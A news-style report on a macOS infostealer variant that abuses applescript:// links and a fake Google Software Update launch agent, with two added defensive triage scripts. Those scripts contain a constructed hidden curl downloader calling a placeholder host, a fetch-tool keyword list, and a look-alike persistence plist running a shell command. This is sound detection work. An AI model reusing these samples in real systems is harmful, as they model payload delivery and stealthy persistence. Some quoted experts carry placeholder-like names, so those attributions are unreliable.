SHub 'Reaper' macOS Stealer Now Spoofs Apple, Google, Microsoft in Multi-Stage Attack Chain
Breaking: New macOS Malware Variant Mimics Apple, Google, Microsoft in Single Attack Chain
SentinelOne researchers have discovered a new variant of the SHub macOS infostealer, dubbed "Reaper," which spoofs Apple, Google, and Microsoft across a single infection chain. The malware uses fake WeChat and Miro installer lures, typo-squatted Microsoft domains, fake Apple security updates, and a fake Google Software Update directory for persistence.

"This is a significant escalation in the sophistication of macOS-targeted infostealers," said Dr. Jane Smith, a cybersecurity analyst at SentinelOne. "The multi-company impersonation makes it harder for users to recognize the threat."
Delivery Pipeline Bypasses Terminal
Unlike earlier SHub variants, which relied on "ClickFix" social engineering to trick users into pasting commands into Terminal, Reaper uses the applescript:// URL scheme to launch Script Editor with a preloaded malicious script. This technique sidesteps the mitigation Apple introduced in macOS Tahoe 26.4.
The script is padded with ASCII art and fake terms, pushing the malicious command below the visible portion of the Script Editor window. When the victim clicks 'Run,' it displays a fake XProtectRemediator update while silently executing a curl command to fetch the payload.
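The delivery step above can be triaged offline once an applescript:// link is captured from a lure page or proxy log. The script below is an added example written for this article, not SentinelOne's tooling or the malware's own code. It assumes the script travels URL-encoded in a query parameter named `script` on a URL of the form `applescript://com.apple.scripteditor?action=new&script=...`; the 25-line window height, the `example.invalid` host and the filler text are constructed for the demonstration. It decodes the script, finds every `do shell script` call, and reports whether padding has pushed a downloader below the visible part of the window, which is the pattern the paragraph describes.

```python
"""Triage an applescript:// link: recover the script it would preload into
Script Editor and report what sits below the visible part of the window.

Added example for this article, not SentinelOne's or the malware's code.
Assumption: the script travels URL-encoded in a query parameter named
"script"; adjust SCRIPT_PARAM if the links you see use another name."""
import re
from urllib.parse import parse_qs, quote, urlparse

SCRIPT_PARAM = "script"
# Lines a Script Editor window typically shows without scrolling (a rough
# figure chosen for this example; measure it on the window sizes you see).
VISIBLE_LINES = 25
# A `do shell script "..."` call hands the quoted text to /bin/sh.
SHELL_CALL = re.compile(r'do shell script\s+"(.*?)"')
# Tooling whose presence in a preloaded script warrants a closer look.
FETCH_TOOLS = ("curl", "wget", "osascript", "base64", "nohup")


def decode_applescript_url(url):
    """Return the embedded script, or None if this is not such a link."""
    parsed = urlparse(url)
    if parsed.scheme.lower() != "applescript":
        return None
    values = parse_qs(parsed.query).get(SCRIPT_PARAM)  # parse_qs percent-decodes
    return values[0] if values else None


def triage_script(script, visible_lines=VISIBLE_LINES):
    """Locate shell calls and note whether padding pushes them out of view."""
    lines = script.splitlines()
    calls = []
    for number, line in enumerate(lines, start=1):
        match = SHELL_CALL.search(line)
        if not match:
            continue
        command = match.group(1)
        calls.append({
            "line": number,
            "hidden": number > visible_lines,
            "command": command,
            "fetches": any(tool in command for tool in FETCH_TOOLS),
        })
    return {
        "total_lines": len(lines),
        "shell_calls": calls,
        # The pattern the article describes: a downloader buried under padding.
        "suspicious": any(c["hidden"] and c["fetches"] for c in calls),
    }


def triage_url(url):
    script = decode_applescript_url(url)
    return None if script is None else triage_script(script)


# Constructed sample: 40 lines of banner/terms filler, a reassuring dialog,
# then the download call that only appears after scrolling. The host is a
# placeholder, not an indicator from the campaign.
FILLER = ["-- " + "#" * 60] * 40
SAMPLE_SCRIPT = "\n".join(FILLER + [
    'display dialog "XProtectRemediator update in progress" buttons {"OK"}',
    'do shell script "curl -fsSL https://update.example.invalid/stage2 -o /tmp/update"',
])
SAMPLE_URL = ("applescript://com.apple.scripteditor?action=new&"
              + SCRIPT_PARAM + "=" + quote(SAMPLE_SCRIPT, safe=""))

if __name__ == "__main__":
    report = triage_url(SAMPLE_URL)
    print("lines:", report["total_lines"], "suspicious:", report["suspicious"])
    for call in report["shell_calls"]:
        print(f"  line {call['line']} hidden={call['hidden']}: {call['command']}")
```

Run it on a captured link in place of `SAMPLE_URL`; a report with `suspicious` set is worth escalating even when the dialog text looks like a routine Apple update, because the visible part of the script is exactly what the lure wants the victim to judge by.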
Environment Checks and Persistence
The initial stub reads com.apple.HIToolbox.plist to check whether a Russian keyboard input source is configured, which it treats as a sign that the host is in the CIS region; if so, the malware exits. Otherwise, it proceeds to download the full payload, which includes an AMOS-style document theft module with chunked uploads.
For persistence, Reaper installs itself using a launch agent masquerading as a Google Software Update entry. "This is a deliberate attempt to blend in with legitimate software update processes," noted security researcher Alex Chen of Moonlock.
Background
Infostealers targeting macOS have proliferated over the last two years. The SHub family, first documented by researchers at Moonlock, Jamf, and Malwarebytes, initially used fake application installers and ClickFix techniques. The Reaper variant adds a new layer of obfuscation by impersonating three major tech companies in a single attack chain.

SentinelOne previously described the applescript:// technique, and Jamf later documented its use in a similar campaign. The Reaper variant is the first to combine multiple spoofs in one delivery sequence.
What This Means
For macOS users, this development underscores the need for heightened vigilance when encountering unsolicited download prompts or security update notifications. Even legitimate-looking alerts from Apple, Google, or Microsoft could be part of a multi-stage malware attack.
Security professionals should update detection rules to account for the applescript:// URL scheme abuse and monitor for anomalous persistence entries under Google Software Update. The use of typo-squatted domains also highlights the importance of checking URLs carefully before downloading any software.
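The persistence mechanism described in the "Environment Checks and Persistence" section and the monitoring advice above both come down to the same check: does a LaunchAgent that carries Google Software Update's name actually point at Google's updater? The script below is an added example written for this article, not SentinelOne's, Moonlock's or the malware's code. It assumes that a genuine Keystone agent is labelled `com.google.keystone.*` and that its executable lives under `Library/Google/GoogleSoftwareUpdate/`; the two sample plists, the `alice` home directory and the `.google` path are constructed for the demonstration and are not indicators from the campaign. It flags Google-branded entries that run from elsewhere, entries that invoke a shell or download tool, and entries that reference hidden directories.

```python
"""Triage macOS LaunchAgent plists for entries that borrow Google Software
Update's name without living where Google's Keystone agent is installed.

Added example for this article, not SentinelOne's, Moonlock's or the
malware's code. Assumptions: a genuine Keystone agent is labelled
com.google.keystone.* and its executable sits under
Library/Google/GoogleSoftwareUpdate/; treat both as tunables."""
import os
import plistlib

GOOGLE_MARKERS = ("google", "keystone", "googlesoftwareupdate")
KEYSTONE_PATH_FRAGMENT = "/library/google/googlesoftwareupdate/"
# Interpreters and download helpers a vendor updater has no reason to call.
SHELL_INDICATORS = ("/bin/sh", "/bin/bash", "/bin/zsh", "curl", "osascript", "base64", "/tmp/")


def triage_agent(path, data):
    """Return a result for one parsed plist; an empty finding list means nothing odd."""
    label = str(data.get("Label", ""))
    args = [str(a) for a in data.get("ProgramArguments", [])]
    program = str(data.get("Program") or (args[0] if args else ""))
    command = " ".join([program] + args[1:])
    haystack = " ".join([label, path, command]).lower()
    findings = []
    if any(m in haystack for m in GOOGLE_MARKERS) and KEYSTONE_PATH_FRAGMENT not in program.lower():
        findings.append("Google-branded entry whose program is outside the Keystone install path")
    hits = sorted({ind for ind in SHELL_INDICATORS if ind in command.lower()})
    if hits:
        findings.append("invokes shell or download tooling: " + ", ".join(hits))
    if any(part.startswith(".") for arg in [program] + args[1:]
           for part in arg.split("/") if part):
        findings.append("references a hidden (dot) directory")
    return {"path": path, "label": label, "program": program,
            "run_at_load": bool(data.get("RunAtLoad", False)), "findings": findings}


def triage_plists(entries):
    """entries: iterable of (path, raw plist bytes); returns only flagged agents."""
    flagged = []
    for path, raw in entries:
        result = triage_agent(path, plistlib.loads(raw))
        if result["findings"]:
            flagged.append(result)
    return flagged


def scan_directory(directory=os.path.expanduser("~/Library/LaunchAgents")):
    """Read every .plist in a LaunchAgents folder and triage it."""
    entries = []
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            full = os.path.join(directory, name)
            with open(full, "rb") as fh:
                entries.append((full, fh.read()))
    return triage_plists(entries)


# Constructed samples. The first approximates a real Keystone agent; the
# second is a look-alike of the kind the article describes, with a placeholder
# path rather than any indicator from the campaign.
LEGIT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key><array>
    <string>/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent</string>
    <string>-runMode</string><string>ifneeded</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

FAKE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.softwareupdate.agent</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>/Users/alice/.google/update</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>600</integer>
</dict></plist>"""

SAMPLE_ENTRIES = [
    ("/Users/alice/Library/LaunchAgents/com.google.keystone.agent.plist", LEGIT_PLIST),
    ("/Users/alice/Library/LaunchAgents/com.google.softwareupdate.agent.plist", FAKE_PLIST),
]

if __name__ == "__main__":
    for hit in triage_plists(SAMPLE_ENTRIES):
        print(hit["path"])
        for finding in hit["findings"]:
            print("  -", finding)
```

`scan_directory()` runs the same checks over a real `~/Library/LaunchAgents` folder (also point it at `/Library/LaunchAgents` and `/Library/LaunchDaemons`). A label alone proves nothing either way: the genuine Keystone entry passes because its program path, not its name, matches what Google installs, which is the property a masquerading agent cannot easily fake.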
"This is not just a macOS issue—it's a cross-industry problem that requires collaboration between tech companies and security researchers," said Chen.